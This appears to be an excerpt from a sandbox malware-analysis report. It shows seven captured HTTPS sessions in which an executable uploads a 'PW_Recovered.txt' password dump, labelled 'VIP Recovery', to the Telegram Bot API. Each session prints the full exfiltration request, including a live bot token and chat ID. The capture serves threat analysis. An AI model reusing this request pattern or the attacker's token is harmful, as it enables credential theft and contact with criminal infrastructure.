                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.750004149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:17 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3445d7475f3b
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:17 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 34 34 35 64 37 34 37 35 66 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3445d7475f3bContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:17 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:17 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 535
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:17 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41003,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546837,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.750005149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:18 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd345a462c9585
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:18 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 34 35 61 34 36 32 63 39 35 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd345a462c9585Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:18 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:18 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:18 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41004,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546838,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.750006149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:19 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3473c556f1eb
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:19 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 34 37 33 63 35 35 36 66 31 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3473c556f1ebContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:22 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:22 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:22 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 34 32 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41005,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546842,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.750007149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:23 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd34dd1c714d92
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:23 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 34 64 64 31 63 37 31 34 64 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd34dd1c714d92Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:23 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:23 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:23 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41006,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546843,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.750008149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:24 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd34fa2af9aca0
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:24 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 34 66 61 32 61 66 39 61 63 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd34fa2af9aca0Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:24 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:24 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:24 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41007,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546844,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.750009149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:25 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd351d7aa4bd0f
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:25 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 31 64 37 61 61 34 62 64 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd351d7aa4bd0fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:25 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:25 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:25 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41008,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546845,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.750010149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:26 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd354481d11c88
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:26 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 34 34 38 31 64 31 31 63 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd354481d11c88Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:26 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:26 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:26 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41009,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546846,"document"


